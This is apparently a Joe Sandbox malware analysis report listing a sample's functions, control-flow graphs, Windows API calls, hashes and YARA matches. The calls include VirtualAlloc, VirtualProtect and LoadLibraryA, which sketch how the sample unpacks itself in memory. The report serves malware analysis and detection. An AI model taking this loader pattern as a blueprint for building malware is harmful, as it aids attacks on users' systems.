                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 78924bc98445a2391149b9471296c65ab5c3f104a6a24834f995a4e0cdf96e1e
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D80286B5200B01DFD324CF25D891B97BBF1FB49705F108A2CE5AA8BAA0D775A845CF85
                                                                                                                                                                                                                                                                        Function 00408850 Relevance: 7.7, APIs: 5, Instructions: 194threadCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 149 408850-408861 call 43bc60 152 408867-40888f call 408020 149->152 153 408acf-408ad1 ExitProcess 149->153 156 408890-4088cb 152->156 157 408904-408916 call 4354e0 156->157 158 4088cd-408902 156->158 161 408ab8-408abf 157->161 162 40891c-40893f GetCurrentProcessId GetCurrentThreadId 157->162 158->156 163 408ac1-408ac7 call 408030 161->163 164 408aca call 43c160 161->164 165 408941-408943 162->165 166 408945-408a3b SHGetSpecialFolderPathW GetForegroundWindow 162->166 163->164 164->153 165->166 169 408a6b-408aac call 409b00 166->169 170 408a3d-408a69 166->170 169->161 174 408aae call 40c550 169->174 170->169 176 408ab3 call 40b390 174->176 176->161
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 0040891C
                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00408925
                                                                                                                                                                                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004089DB
                                                                                                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 00408A33
                                                                                                                                                                                                                                                                          • Part of subcall function 0040C550: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563
                                                                                                                                                                                                                                                                          • Part of subcall function 0040B390: FreeLibrary.KERNEL32(00408AB8), ref: 0040B396
                                                                                                                                                                                                                                                                          • Part of subcall function 0040B390: FreeLibrary.KERNEL32 ref: 0040B3B7
                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00408AD1
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 3072701918-0
                                                                                                                                                                                                                                                                        • Opcode ID: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
                                                                                                                                                                                                                                                                        • Instruction ID: 4e8ceca9db94e69365d2c2d7f1aefafb9de861df3649afd20bfce81a3928f3be
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9351A9BBF102180BD71CAEAACD463A675878BC5710F1F813E5985EB7D6EDB88C0142C9
                                                                                                                                                                                                                                                                        Function 004707A6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 189 4707a6-4707bf 190 4707c1-4707c3 189->190 191 4707c5 190->191 192 4707ca-4707d6 CreateToolhelp32Snapshot 190->192 191->192 193 4707e6-4707f3 Module32First 192->193 194 4707d8-4707de 192->194 195 4707f5-4707f6 call 470465 193->195 196 4707fc-470804 193->196 194->193 199 4707e0-4707e4 194->199 200 4707fb 195->200 199->190 199->193 200->196
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 004707CE
                                                                                                                                                                                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 004707EE
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716537575.0000000000470000.00000040.00001000.00020000.00000000.sdmp, Offset: 00470000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_470000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 3833638111-0
                                                                                                                                                                                                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                        • Instruction ID: 5595ceff43f7b3773f2b5f76221f31d5ab95906f67ec572e80d6a2261ca759b8
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6F0C231102310ABD7203AB5988CAAFB7ECAF49725F10852AE64A911C0DA78F8054A64
                                                                                                                                                                                                                                                                        Function 0043C1F0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 214 43c1f0-43c222 LdrInitializeThunk
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                                                        Function 0043C767 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: ,+*)
                                                                                                                                                                                                                                                                        • API String ID: 0-3529585375
                                                                                                                                                                                                                                                                        • Opcode ID: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
                                                                                                                                                                                                                                                                        • Instruction ID: 95b520c28a51d7a8debe208fb8c6725e065a55489a7142fefcc330b3f2274472
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7331A539B402119BEB18CF58CCD1BBEB7B2BB49301F249129D501B7390CB75AD018B58
                                                                                                                                                                                                                                                                        Function 0040B70C Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: o`
                                                                                                                                                                                                                                                                        • API String ID: 0-3993896143
                                                                                                                                                                                                                                                                        • Opcode ID: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
                                                                                                                                                                                                                                                                        • Instruction ID: 0bdba0f6bf2b5cd18ae264ba298f37260da84434396a298b3053f459174327b1
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9C11C270218340AFC310DF65DDC1B6BBFE2DBC2204F65983DE185A72A1C675E9499719
                                                                                                                                                                                                                                                                        Function 0071003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 0 71003c-710047 1 710049 0->1 2 71004c-710263 call 710a3f call 710e0f call 710d90 VirtualAlloc 0->2 1->2 17 710265-710289 call 710a69 2->17 18 71028b-710292 2->18 23 7102ce-7103c2 VirtualProtect call 710cce call 710ce7 17->23 20 7102a1-7102b0 18->20 22 7102b2-7102cc 20->22 20->23 22->20 29 7103d1-7103e0 23->29 30 7103e2-710437 call 710ce7 29->30 31 710439-7104b8 VirtualFree 29->31 30->29 33 7105f4-7105fe 31->33 34 7104be-7104cd 31->34 37 710604-71060d 33->37 38 71077f-710789 33->38 36 7104d3-7104dd 34->36 36->33 42 7104e3-710505 LoadLibraryA 36->42 37->38 43 710613-710637 37->43 40 7107a6-7107b0 38->40 41 71078b-7107a3 38->41 44 7107b6-7107cb 40->44 45 71086e-7108be LoadLibraryA 40->45 41->40 46 710517-710520 42->46 47 710507-710515 42->47 48 71063e-710648 43->48 49 7107d2-7107d5 44->49 52 7108c7-7108f9 45->52 50 710526-710547 46->50 47->50 48->38 51 71064e-71065a 48->51 53 710824-710833 49->53 54 7107d7-7107e0 49->54 55 71054d-710550 50->55 51->38 56 710660-71066a 51->56 57 710902-71091d 52->57 58 7108fb-710901 52->58 64 710839-71083c 53->64 59 7107e2 54->59 60 7107e4-710822 54->60 61 7105e0-7105ef 55->61 62 710556-71056b 55->62 63 71067a-710689 56->63 58->57 59->53 60->49 61->36 65 71056d 62->65 66 71056f-71057a 62->66 67 710750-71077a 63->67 68 71068f-7106b2 63->68 64->45 69 71083e-710847 64->69 65->61 71 71059b-7105bb 66->71 72 71057c-710599 66->72 67->48 73 7106b4-7106ed 68->73 74 7106ef-7106fc 68->74 75 710849 69->75 76 71084b-71086c 69->76 83 7105bd-7105db 71->83 72->83 73->74 77 71074b 74->77 78 7106fe-710748 74->78 75->45 76->64 77->63 78->77 83->55
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0071024D
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                                                        • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                                        • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                        • Instruction ID: dddb954d4c91f8c1d024fd704acbca7c65cfc46efce7c1d5c5ba78576aae2c30
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2D527974A00229DFDB64CF58C984BA8BBB1BF09304F1480D9E94DAB291DB74AED4DF54
                                                                                                                                                                                                                                                                        Function 00710E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 202 710e0f-710e24 SetErrorMode * 2 203 710e26 202->203 204 710e2b-710e2c 202->204 203->204
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,00710223,?,?), ref: 00710E19
                                                                                                                                                                                                                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,00710223,?,?), ref: 00710E1E
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: ErrorMode
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                        • Instruction ID: dd936021994f715312386500ef353d09b2d1401ac4667c0c5e3c6ca7852f469a
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F4D0123114512877DB003A95DC09BCD7B1CDF05B62F008411FB0DD9080C7B4998046E5
                                                                                                                                                                                                                                                                        Function 0040E71A Relevance: 2.5, APIs: 2, Instructions: 8COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 205 40e71a-40e738 CoUninitialize * 2
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Uninitialize
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 3861434553-0
                                                                                                                                                                                                                                                                        • Opcode ID: bd4e50c2cf2632c146e6dc99e67d996af78d75fcb2eac0acec7d90a27868b704
                                                                                                                                                                                                                                                                        • Instruction ID: 47d587ad0eb400b5f6ee0cc7c77a8a39c50d7b10eba8d8677ba26603a35f3bb5
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd4e50c2cf2632c146e6dc99e67d996af78d75fcb2eac0acec7d90a27868b704
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 10C04CFDA85141EFD384CF24EC5A4157725AB866873000535F913C2370CA6065818A0C
                                                                                                                                                                                                                                                                        Function 0043C2C8 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 206 43c2c8-43c2d6 207 43c2e0-43c2fd 206->207 207->207 208 43c2ff-43ccb9 GetForegroundWindow call 43e110 207->208 211 43ccbe-43ccdf 208->211
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 0043CCAF
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: ForegroundWindow
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 2020703349-0
                                                                                                                                                                                                                                                                        • Opcode ID: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
                                                                                                                                                                                                                                                                        • Instruction ID: 8fb46afbfb550afb85baefcd5c24b2e1a72551ea741637eac68a3138d718cba2
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 07F04CBAD005408BDB044B75CC821A67BA2DB5F320B18897DD441E3384C63C5807CB5D
                                                                                                                                                                                                                                                                        Function 0040C550 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 212 40c550-40c580 CoInitializeEx
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Initialize
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 2538663250-0
                                                                                                                                                                                                                                                                        • Opcode ID: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
                                                                                                                                                                                                                                                                        • Instruction ID: e03bcfaf696d6c281ff3d22d3b8d0c31e3889364fa9117d67ae1079de8c3c82d
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43D0A7B557050867D2086B1DDC4BF22772C8B83B66F50423DF2A7C61D1D9506A14CA79
                                                                                                                                                                                                                                                                        Function 0040C583 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 213 40c583-40c5b2 CoInitializeSecurity
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C595
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: InitializeSecurity
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 640775948-0
                                                                                                                                                                                                                                                                        • Opcode ID: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
                                                                                                                                                                                                                                                                        • Instruction ID: 58e2b5502705141ff0d3aa7c975cc0701997441b8ab7d7d43dac110591522243
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F1D0C9B47D83407AF5749B08AC17F143210A702F56F740228B363FE2E0C9E172018A0C
                                                                                                                                                                                                                                                                        Function 0043AAA0 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 215 43aaa0-43aaac 216 43aab3-43aabe call 43d810 RtlFreeHeap 215->216 217 43aac4-43aac5 215->217 216->217
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(?,00000000,?,0043C1D6,?,0040B2E4,00000000,00000001), ref: 0043AABE
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                        • Opcode ID: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
                                                                                                                                                                                                                                                                        • Instruction ID: 16971ee2c2e030bf17817a0d81dc477e65560ccac1e7abaabcdfe7fdc6775186
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2D01231505522EBC6102F25FC06B863A58EF0E761F0748B1B4006B071C765ECA186D8
                                                                                                                                                                                                                                                                        Function 0043AA80 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 220 43aa80-43aa97 call 43d810 RtlAllocateHeap
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(?,00000000,?,?,0043C1C0), ref: 0043AA90
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                        • Opcode ID: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
                                                                                                                                                                                                                                                                        • Instruction ID: 72b53a506d10aa35cab301047588232e26feb19e762ad2a100d4e8a4b6eb39e1
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D6C09231445220BBCA143B16FC09FCA3F68EF4D762F0244A6F514670B2CB61BCA2CAD8
                                                                                                                                                                                                                                                                        Function 00470465 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 004704B6
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716537575.0000000000470000.00000040.00001000.00020000.00000000.sdmp, Offset: 00470000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_470000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                        • Instruction ID: a0bfb27cbe6de90053606688358b4ba16acdfac2ce2fc8a29e6b2121caff52c3
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F113F79A40208EFDB01DF98C985E99BBF5AF08350F05C095F9489B362D375EA50DF84

                                                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                                                        Function 007221F7 Relevance: 105.7, Strings: 83, Instructions: 1935COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
